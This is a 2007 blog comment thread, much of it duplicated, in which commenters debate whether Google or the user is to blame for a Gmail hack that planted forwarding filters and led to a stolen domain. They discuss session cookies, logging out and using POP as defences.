From my understanding of the article, check your forwarding and filter settings and make sure you recognize the address(es) listed. If you see a filter or forward command you didn't put there, you've got a problem. Or so I read it.
There are filters you didn't create in your filter list, doing things like forwarding e-mails to another address and deleting the GMail copy before it ever gets to your Inbox.
What chokes me about this is that everybody is pointing the finger at Google, when the security gap is the result of unsafe email practices on the part of the individual. Not that I'm particularly fond of Google, but I'd rather people know what they're supposed to do to stop this entire type of hack from working rather than blame Google and keep leaving themselves open to being hacked in a similar but not-blocked-by-Gmail way.
In order for hacks liek this to work, one of the following needs to happen: 1) You need to be logged into Gmail while surfing the web. 2) You check the "Remember Me on this Computer" box when logging in.
Both are security risks that you should not be taking if email security is important to you. If physical security isn't a problem, then use POP if you want convenience. Otherwise, log in explicitly, check your email, and then hit the sign out link at the top right hand side before you do anything else.
Hotmail went on a crusade to get people to explicitly logout back in the late nineties to stop exactly this kind of thing from happening. It's not a new idea, but people keep going for convenience at the risk of security because they don't think about the consequences until after they get bitten.
Sorry, I've forgotten again why it is that I might want my email open all day long.[1] It might be because I like not having to manually log in every time I want to see if I've gotten new email, it might be because of this handle little "google chat" feature they added, and it might *just* be because it's unreasonable to expect that keeping one program open while working in another should be a security risk.
We're not talking about walking away while logged in, here, or saving your passwords in plain text[2]. We're talking about using a system in the manner for which it was designed and intended to be used, and getting burned by it through sloppy coding.
If physical security isn't a problem, then use POP if you want convenience.
Except that POP is not convenient, and IMAP is just like keeping Gmail open, but slower, requires a duplicate address book, and requires another program to run on your machine.
GMail is built to be a fully functional mail client. That means being left open to receive and respond to new mail. This means that security failures due to usage of this product in it's intended, designed fashion are exactly analogous to Microsoft's endless security failures in Outlook and Outlook Express.
[1]: Although I never set "remember me". That's not the point. [2]: Which can also be done securely enough to not matter to people who aren't in front of your computer, but that's not the point EITHER.
From Gmail's help section: "When you check the box and log in, Gmail sets a cookie (lasting two weeks) to remember you when you return to the site from the same computer. To disable the cookie, just click Sign out at the top of any Gmail page. You'll need to re-enter your username and password when you return to Gmail.
We encourage you to log out of your account at the end of each session to protect the security of your email information. Logging out of Gmail is especially important if you check your email on a public computer. To end your Gmail session, just click Sign out at the top of any Gmail page."
You'll find a similar section in the help pages of every web-based email app in existence, because this is an inherent vulnerability of web-based email. It's not just GMail, though GMail is popular enough that they're the easiest target.
You've given good reasons why people choose convenience over security, and as you've pointed out the system was designed to give you that choice. That doesn't make the company responsible when somebody chooses convenience when they should have chosen security (as is exactly the case for this gentleman's business).
As for the convenience of POP, it's a good compromise between convenience and security; it's more secure than leaving the cookie there, and more convenient than logging in manually every time I want to check my email. Toss in that it allows me to keep a local copy of my email while having GMail as an offsite backup, and I'm sold.
ou'll find a similar section in the help pages of every web-based email app in existence
Uh, yeah, because closing your browser without logging out means that the next person can log in.
However, as it quite clearly says, you should do this at the end of your *session*.
And your *session* is going to be minutes or hours or even potentially days long, as is expected with the way normal people use email AND as is expected in the design of email applications.
Applications like, say, Gmail. Which is explicitly and deliberately designed to be something that you keep open as long as you're using the computer, so that you can get your up-to-the-minute emails and chats.
And it should in no way be a security risk, any more than keeping your pop client open should be a security risk, and it should be considered Google's fault when there's a security hole in their system, just as it's Microsoft's fault when Outlook Express has one.
That is, unfortunately, out of Google's hands. It's an inherent risk in any web-based client/server application, and it applies to every other webmail app out there. The web wasn't designed for client/server stuff, and we have to find hacky ways around it that are relatively insecure. The only way to change that is to remove the web-based component entirely. Meaning that GMail would turn off webmail entirely and force you to use POP.
Which is why I mentioned POP in the first place, it isn't web-based. A POP application doesn't keep a session open that an outside app can hijack. It only connects to GMail when it goes to get your email, and closes the session the second it does so. You don't need an open session to read your email, and the session is a lot more secure because it's not web-based.
To get back on topic, if you want to keep GMail open for hours at a time, that's your call. You have the option to do so. However, you open yourself up to the possibility of being hacked in a similar fashion because the same cookie the "remember me" function uses is there when you're logged in. There is no difference whatsoever from a security perspective. If you aren't worried about the risk, then go to it. If you are, then don't.
In this case, the gentleman is running a business. Taking that risk with his business was foolish of him, and he has been hurt badly because of it. As an aside, I’ve contacted him directly to tell him how he can protect himself in future, so this isn’t just me blowing steam.
Really, there are two ways people can choose to see this: 1) Rely on Google to handle their security for them, and blame Google when it fails. 2) Examine their own actions and protect themselves, and use Google's security features as a secondary form of defense.
I obviously prefer the latter. If I choose to use GMail in a dangerous fashion, and I get bitten by it, I take responsibility for that, because that allows me to change what I'm doing so that it doesn't happen again rather than continue to be at risk. Isn't that really the whole point?
![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
(no subject)
Date: 2007-12-27 05:43 pm (UTC)(no subject)
Date: 2007-12-27 06:09 pm (UTC)(no subject)
Date: 2007-12-27 06:24 pm (UTC)(no subject)
Date: 2007-12-27 06:34 pm (UTC)(no subject)
Date: 2007-12-27 06:35 pm (UTC)(no subject)
Date: 2007-12-27 09:09 pm (UTC)(no subject)
Date: 2007-12-27 06:38 pm (UTC)(no subject)
Date: 2007-12-27 06:49 pm (UTC)Thanks for posting that. The stealing of a domain name aspect is a tad scary.
(no subject)
Date: 2007-12-27 08:02 pm (UTC)In order for hacks liek this to work, one of the following needs to happen:
1) You need to be logged into Gmail while surfing the web.
2) You check the "Remember Me on this Computer" box when logging in.
Both are security risks that you should not be taking if email security is important to you. If physical security isn't a problem, then use POP if you want convenience. Otherwise, log in explicitly, check your email, and then hit the sign out link at the top right hand side before you do anything else.
Hotmail went on a crusade to get people to explicitly logout back in the late nineties to stop exactly this kind of thing from happening. It's not a new idea, but people keep going for convenience at the risk of security because they don't think about the consequences until after they get bitten.
(no subject)
Date: 2007-12-27 08:41 pm (UTC)We're not talking about walking away while logged in, here, or saving your passwords in plain text[2]. We're talking about using a system in the manner for which it was designed and intended to be used, and getting burned by it through sloppy coding.
If physical security isn't a problem, then use POP if you want convenience.
Except that POP is not convenient, and IMAP is just like keeping Gmail open, but slower, requires a duplicate address book, and requires another program to run on your machine.
GMail is built to be a fully functional mail client. That means being left open to receive and respond to new mail. This means that security failures due to usage of this product in it's intended, designed fashion are exactly analogous to Microsoft's endless security failures in Outlook and Outlook Express.
[1]: Although I never set "remember me". That's not the point.
[2]: Which can also be done securely enough to not matter to people who aren't in front of your computer, but that's not the point EITHER.
(no subject)
Date: 2007-12-27 09:47 pm (UTC)"When you check the box and log in, Gmail sets a cookie (lasting two weeks) to remember you when you return to the site from the same computer. To disable the cookie, just click Sign out at the top of any Gmail page. You'll need to re-enter your username and password when you return to Gmail.
We encourage you to log out of your account at the end of each session to protect the security of your email information. Logging out of Gmail is especially important if you check your email on a public computer. To end your Gmail session, just click Sign out at the top of any Gmail page."
You'll find a similar section in the help pages of every web-based email app in existence, because this is an inherent vulnerability of web-based email. It's not just GMail, though GMail is popular enough that they're the easiest target.
You've given good reasons why people choose convenience over security, and as you've pointed out the system was designed to give you that choice. That doesn't make the company responsible when somebody chooses convenience when they should have chosen security (as is exactly the case for this gentleman's business).
As for the convenience of POP, it's a good compromise between convenience and security; it's more secure than leaving the cookie there, and more convenient than logging in manually every time I want to check my email. Toss in that it allows me to keep a local copy of my email while having GMail as an offsite backup, and I'm sold.
(no subject)
Date: 2007-12-27 10:01 pm (UTC)Uh, yeah, because closing your browser without logging out means that the next person can log in.
However, as it quite clearly says, you should do this at the end of your *session*.
And your *session* is going to be minutes or hours or even potentially days long, as is expected with the way normal people use email AND as is expected in the design of email applications.
Applications like, say, Gmail. Which is explicitly and deliberately designed to be something that you keep open as long as you're using the computer, so that you can get your up-to-the-minute emails and chats.
And it should in no way be a security risk, any more than keeping your pop client open should be a security risk, and it should be considered Google's fault when there's a security hole in their system, just as it's Microsoft's fault when Outlook Express has one.
(no subject)
Date: 2007-12-27 11:08 pm (UTC)Which is why I mentioned POP in the first place, it isn't web-based. A POP application doesn't keep a session open that an outside app can hijack. It only connects to GMail when it goes to get your email, and closes the session the second it does so. You don't need an open session to read your email, and the session is a lot more secure because it's not web-based.
To get back on topic, if you want to keep GMail open for hours at a time, that's your call. You have the option to do so. However, you open yourself up to the possibility of being hacked in a similar fashion because the same cookie the "remember me" function uses is there when you're logged in. There is no difference whatsoever from a security perspective. If you aren't worried about the risk, then go to it. If you are, then don't.
In this case, the gentleman is running a business. Taking that risk with his business was foolish of him, and he has been hurt badly because of it. As an aside, I’ve contacted him directly to tell him how he can protect himself in future, so this isn’t just me blowing steam.
Really, there are two ways people can choose to see this:
1) Rely on Google to handle their security for them, and blame Google when it fails.
2) Examine their own actions and protect themselves, and use Google's security features as a secondary form of defense.
I obviously prefer the latter. If I choose to use GMail in a dangerous fashion, and I get bitten by it, I take responsibility for that, because that allows me to change what I'm doing so that it doesn't happen again rather than continue to be at risk. Isn't that really the whole point?